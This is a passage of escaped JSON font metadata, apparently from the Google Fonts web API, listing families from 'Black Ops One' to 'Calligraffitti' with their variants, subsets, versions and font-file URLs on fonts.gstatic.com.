\"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Black Ops One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blackopsone/v20/qWcsB6-ypo7xBdr6Xshe96H3WDzRtjkho4M.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Blaka\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blaka/v5/8vIG7w8722p_6kdr20D2FV5e.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Blaka Hollow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blakahollow/v5/MCoUzAL91sjRE2FsKsxUtezYB9oFyW_-oA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Blaka Ink\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-14\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/blakaink/v5/AlZy_zVVtpj22Znag2chdXf4XB0Tow.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Blinker\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/blinker/v12/cIf_MaFatEE-VTaP_E2hZEsCkIt9QQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_OGARGEsnIJkWL4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_IWDRGEsnIJkWL4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/blinker/v12/cIf9MaFatEE-VTaPxCmrYGkHgIs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_PGFRGEsnIJkWL4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_JWERGEsnIJkWL4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_ImHRGEsnIJkWL4.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_K2GRGEsnIJkWL4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bodoni Moda\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oU7awIBytVjMYwE.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oXzawIBytVjMYwE.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oZDdwIBytVjMYwE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oandwIBytVjMYwE.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oc7dwIBytVjMYwE.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oefdwIBytVjMYwE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZKMN4sXrJcwHqoQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZGsN4sXrJcwHqoQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZ9sR4sXrJcwHqoQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZz8R4sXrJcwHqoQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZqMR4sXrJcwHqoQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZgcR4sXrJcwHqoQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bokor\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bokor/v30/m8JcjfpeeaqTiR2WdInbcaxE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bona Nova\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bonanova/v10/B50NF7ZCpX7fcHfvIUBJi6hqHK-CLA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bonanova/v10/B50LF7ZCpX7fcHfvIUB5iaJuPqqSLJYf.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bonanova/v10/B50IF7ZCpX7fcHfvIUBxN4dOFISeJY8GgQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bonbon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bonbon/v26/0FlVVPeVlFec4ee_cDEAbQY5-A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bonheur Royale\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bonheurroyale/v9/c4m51nt_GMTrtX-b9GcG4-YRmYK_c0f1N5Ij.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Boogaloo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/boogaloo/v19/kmK-Zq45GAvOdnaW6x1F_SrQo_1K.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bowlby One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bowlbyone/v19/taiPGmVuC4y96PFeqp8smo6C_Z0wcK4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bowlby One SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bowlbyonesc/v19/DtVlJxerQqQm37tzN3wMug9Pzgj8owhNjuE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Brawler\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/brawler/v19/xn7gYHE3xXewAscGsgC7S9XdZN8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/brawler/v19/xn7lYHE3xXewAscGiryUb932eNaPfk8.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bree Serif\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/breeserif/v17/4UaHrEJCrhhnVA3DgluAx63j5pN1MwI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Brygada 1918\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y2-f-V8Wu5O3gbo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y12f-V8Wu5O3gbo.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y7GY-V8Wu5O3gbo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y4iY-V8Wu5O3gbo.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfcERwcv7GykboaLg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfcIxwcv7GykboaLg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfczxscv7GykboaLg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfc9hscv7GykboaLg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bubblegum Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bubblegumsans/v16/AYCSpXb_Z9EORv1M5QTjEzMEtdaHzoPPb7R4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bubbler One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bubblerone/v20/f0Xy0eqj68ppQV9KBLmAouHH26MPePkt.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Buda\",\n      \"variants\": [\n        \"300\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/buda/v25/GFDqWAN8mnyIJSSrG7UBr7pZKA0.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Buenard\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/buenard/v17/OD5DuM6Cyma8FnnsPzf9qGi9HL4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/buenard/v17/OD5GuM6Cyma8FnnsB4vSjGCWALepwss.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungee/v11/N0bU2SZBIuF2PU_ECn50Kd_PmA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee Hairline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungeehairline/v18/snfys0G548t04270a_ljTLUVrv-7YB2dQ5ZPqQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee Inline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungeeinline/v11/Gg8zN58UcgnlCweMrih332VuDGJ1-FEglsc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee Outline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungeeoutline/v18/_6_mEDvmVP24UvU2MyiGDslL3Qg3YhJqPXxo.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee Shade\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungeeshade/v11/DtVkJxarWL0t2KdzK3oI_jks7iLSrwFUlw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bungee Spice\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-14\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bungeespice/v8/nwpTtK2nIhxE0q-IwgSpZBqCzyI-aMPF7Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Butcherman\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/butcherman/v24/2EbiL-thF0loflXUBOdb1zWzq_5uT84.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Butterfly Kids\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/butterflykids/v21/ll8lK2CWTjuqAsXDqlnIbMNs5S4arxFrAX1D.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cabin\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EL7Gvxm7rE_s.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkW-EL7Gvxm7rE_s.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkYODL7Gvxm7rE_s.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkbqDL7Gvxm7rE_s.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHx_KlwkzuA_u1Bg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXH9fKlwkzuA_u1Bg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHGfWlwkzuA_u1Bg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHIPWlwkzuA_u1Bg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cabin Condensed\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cabincondensed/v19/nwpMtK6mNhBK2err_hqkYhHRqmwaYOjZ5HZl8Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwilMH97F15-K1oqQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwiuMb97F15-K1oqQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwi3Mf97F15-K1oqQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cabin Sketch\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cabinsketch/v19/QGYpz_kZZAGCONcK2A4bGOjMn9JM6fnuKg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cabinsketch/v19/QGY2z_kZZAGCONcK2A4bGOj0I_1o4dLyI4CMFw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caesar Dressing\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caesardressing/v21/yYLx0hLa3vawqtwdswbotmK4vrR3cbb6LZttyg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cagliostro\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cagliostro/v21/ZgNWjP5HM73BV5amnX-TjGXEM4COoE4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cairo\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hGA-W1ToLQ-HmkA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hL4-W1ToLQ-HmkA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hOA-W1ToLQ-HmkA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hNI-W1ToLQ-HmkA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hD45W1ToLQ-HmkA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hAc5W1ToLQ-HmkA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hGA5W1ToLQ-HmkA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/cairo/v22/SLXgc1nY6HkvangtZmpQdkhzfH5lkSs2SgRjCAGMQ1z0hEk5W1ToLQ-HmkA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cairo Play\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1EnYq9yXa8GvzaA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1zHYq9yXa8GvzaA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1knYq9yXa8GvzaA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1oHYq9yXa8GvzaA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1THEq9yXa8GvzaA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1dXEq9yXa8GvzaA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1EnEq9yXa8GvzaA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/cairoplay/v6/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1O3Eq9yXa8GvzaA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caladea\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caladea/v7/kJEzBugZ7AAjhybUjR93-9IztOc.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/caladea/v7/kJExBugZ7AAjhybUvR19__A2pOdvDA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/caladea/v7/kJE2BugZ7AAjhybUtaNY39oYqO52FZ0.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/caladea/v7/kJE0BugZ7AAjhybUvR1FQ98SrMxzBZ2lDA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Calistoga\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/calistoga/v13/6NUU8F2OJg6MeR7l4e0vtMYAwdRZfw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Calligraffitti\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": 